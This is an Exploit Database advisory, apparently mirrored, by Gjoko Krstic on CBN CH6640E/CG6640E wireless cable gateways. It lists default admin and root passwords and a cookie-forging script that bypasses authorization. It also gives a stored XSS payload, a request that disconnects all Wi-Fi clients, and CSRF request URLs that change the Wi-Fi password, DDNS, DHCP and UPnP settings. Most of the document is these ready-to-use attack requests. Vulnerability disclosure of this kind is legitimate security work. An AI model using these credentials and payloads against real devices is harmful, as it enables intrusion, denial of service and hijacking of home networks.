CBN CH6640E/CG6640E Wireless Gateway Series – Multiple Vulnerabilities

• Exploit Database
• 9 阅读

• 作者： LiquidWorm
  日期： 2014-10-27
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35075/

• 
  CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
  
  
  Vendor: Compal Broadband Networks (CBN), Inc.
  Product web page: http://www.icbn.com.tw
  Affected version: Model: CH6640 and CH6640E
  Hardware version: 1.0
  Firmware version: CH6640-3.5.11.7-NOSH
  Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
  DOCSIS mode: DOCSIS 3.0
  
  
  Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
  home office, or small business/enterprise. It can be used in households with
  one or more computers capable of wireless connectivity for remote access to
  the wireless gateway.
  
  Default credentials:
  
  admin/admin - Allow access gateway pages
  root/compalbn - Allow access gateway, provisioning pages and provide more
  configuration information.
  
  Desc: The CBN modem gateway suffers from multiple vulnerabilities including
  authorization bypass information disclosure, stored XSS, CSRF and denial of
  service.
  
  Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5203
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
  
  
  04.10.2014
  
  ---
  
  
  
  Authorization Bypass Information Disclosure Vulnerability
  #########################################################
  
  http://192.168.0.1/xml/CmgwWirelessSecurity.xml
  http://192.168.0.1/xml/DocsisConfigFile.xml
  http://192.168.0.1/xml/CmgwBasicSetup.xml
  http://192.168.0.1/basicDDNS.html
  http://192.168.0.1/basicLanUsers.html
  http://192.168.0.1:5000/rootDesc.xml
  
  Set cookie: userData to root or admin, reveals additional pages/info.
  
  --
  <html>
  <body>
  <script>
  document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
  </script>
  </body>
  </html>
  --
  
  
  Denial of Service (DoS) for all WiFi connected clients (disconnect)
  ###################################################################
  
  GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
  
  
  Stored Cross-Site Scripting (XSS) Vulnerability
  ###############################################
  
  Cookie: userData
  Value: hax0r"><script>alert(document.cookie);</script>
  
  --
  <html>
  <body>
  <script>
  document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
  </script>
  </body>
  </html>
  --
  
  
  Cross-Site Request Forgery (CSRF) Vulnerability
  ###############################################
  
  DDNS config:
  ------------
  
  GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
  
  
  Change wifi pass:
  -----------------
  
  GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
  
  
  Add static mac address (static assigned dhcp client):
  -----------------------------------------------------
  
  GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
  
  
  Enable/Disable UPnP:
  --------------------
  
  GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
  GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)